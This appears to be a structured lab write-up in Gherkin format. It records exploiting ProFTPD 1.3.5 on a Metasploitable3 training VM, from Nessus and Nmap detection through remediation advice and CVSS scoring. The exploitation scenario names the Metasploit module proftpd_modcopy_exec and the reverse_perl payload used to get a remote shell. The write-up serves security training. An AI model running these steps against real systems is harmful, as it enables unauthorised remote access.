## Version 1.4.1
## language: en
Feature:
  TOE:
    Metasploitable3
  Location:
    192.168.199.131:21 TCP
  CWE:
    CWE-0284: Access Control Issues
  Rule:
    REQ.262: Verify third-party components
  Goal:
    Get remote shell on the machine
  Recommendation:
    Update software when critical fixes are available

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | kali-linux      | 2020.4      |
    | VMware          | 16.1.0      |
    | Nmap            | 7.70        |
    | Nessus          | 8.14.x      |
    | Metasploit      | 5.0.4       |
  TOE information:
    Given I am running Metasploitable 3 ubuntu on VMware Workstation 15
    And I am using kali-linux

  Scenario: Normal use case
    Given ProFTPD is running on the machine
    When An authorized user wants to use a FTP service
    Then He can connect to the server

  Scenario: Static detection
    Given I don't have access to the source code
    Then This can't be done

  Scenario: Dynamic detection
    Given I know the machine has some open services
    When I use Nessus to do a vulnerability scan
    Then I got the Nessus report [evidence](nessus.png)
    And I scan with Nmap to confirm the vulnerability
    """
    $ nmap -A -T4 -p- 192.168.199.131
    21/tcp  open  ftp   ProFTPD 1.3.5
    """
    Then I can conclude that anyone can access remotely

  Scenario: Exploitation
    Given The port 21 is open and running an outdated service
    When I open msfconsole
    And I search for 'proftpd'
    Then I use
    """
    exploit/unix/ftp/proftpd_modcopy_exec
    """
    And I set the available options [evidence](exploit1.png)
    When I run the exploit
    Then I get an error
    """
    192.168.199.131:80 - Exploit failed: An exploit error occurred.
    Exploit completed, but no session was created
    """
    When I check for extra options with <<show -h>>
    And I use
    """
    set payload cmd/unix/reverse_perl
    """
    Then I can configure the listener [evidence](exploit2.png)
    When I run the exploit
    Then I got a session with access to the service [evidence](shell.png)

  Scenario: Remediation
    Given The compromised version of ProFTPD running on the machine
    And The official fix in version 1.3.5a / 1.3.6rc1 or later
    Then To fix it, an updated version must be installed

  Scenario: Scoring
  Base: Attributes that are constants over time and organizations
    9.8/10 (Critical) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.1/10 (Critical) - E:F/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    9.1/10 (Critical) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2021-04-06
